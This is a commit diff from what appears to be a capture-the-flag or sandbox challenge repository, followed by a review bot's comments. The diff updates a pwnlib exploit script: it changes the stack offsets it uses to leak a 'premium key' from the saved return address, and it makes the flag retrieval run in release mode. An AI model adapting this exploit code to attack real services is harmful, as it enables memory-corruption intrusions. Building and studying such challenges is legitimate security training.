Random code addresses (#5)

* Enable random addresses for generated code

* Enable custom stack in sandbox

* Triggering CI?

* Update exploit to work in release mode.
Maier Johannes
2024-01-25 01:24:31 +01:00
committed by GitHub
parent b3e3b7b049
commit 01934af8be
2 changed files with 28 additions and 8 deletions


@@ -126,9 +126,9 @@ def exec_program(p: pwnlib.tubes.remote.remote, program: bytes) -> int:
def extract_premium_key(is_debug: bool = False, port: int = PORT):
if is_debug:
offset_saved_rip_to_activation_key = 0x396d # debug mode
offset_saved_rip_to_activation_key = 0x38bc # debug mode
else:
offset_saved_rip_to_activation_key = 0x2832 # release mode
offset_saved_rip_to_activation_key = 0x37a6 # release mode
premium_key = b""
@@ -216,8 +216,9 @@ def get_flag(p: pwnlib.tubes.remote.remote, is_debug: bool = False):
if __name__ == "__main__":
context.log_level = 'warn'
debug = False
premium_key = extract_premium_key(is_debug=True)
premium_key = extract_premium_key(is_debug=debug)
p = connect(premium_key, True)
print(get_flag(p, is_debug=True))
print(get_flag(p, is_debug=debug))
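Review bot: The call `connect(premium_key, True)` in the `__main__` block still passes a literal `True`, while the two neighbouring calls now take the new `debug` variable. The signature of `connect` is not visible in this hunk, so this is inferred: if that argument is also a debug switch it should read `p = connect(premium_key, debug)`, and if it means something else, passing it by keyword would make that clear. Separately, the two values assigned to `offset_saved_rip_to_activation_key` in `extract_premium_key` are bare constants that must match one specific build, and this commit had to change both of them. A comment such as `# measured against build <COMMIT_PLACEHOLDER>; re-measure after any rebuild` on each would make a stale value recognisable when CI fails. The body of `extract_premium_key` continues outside the hunk.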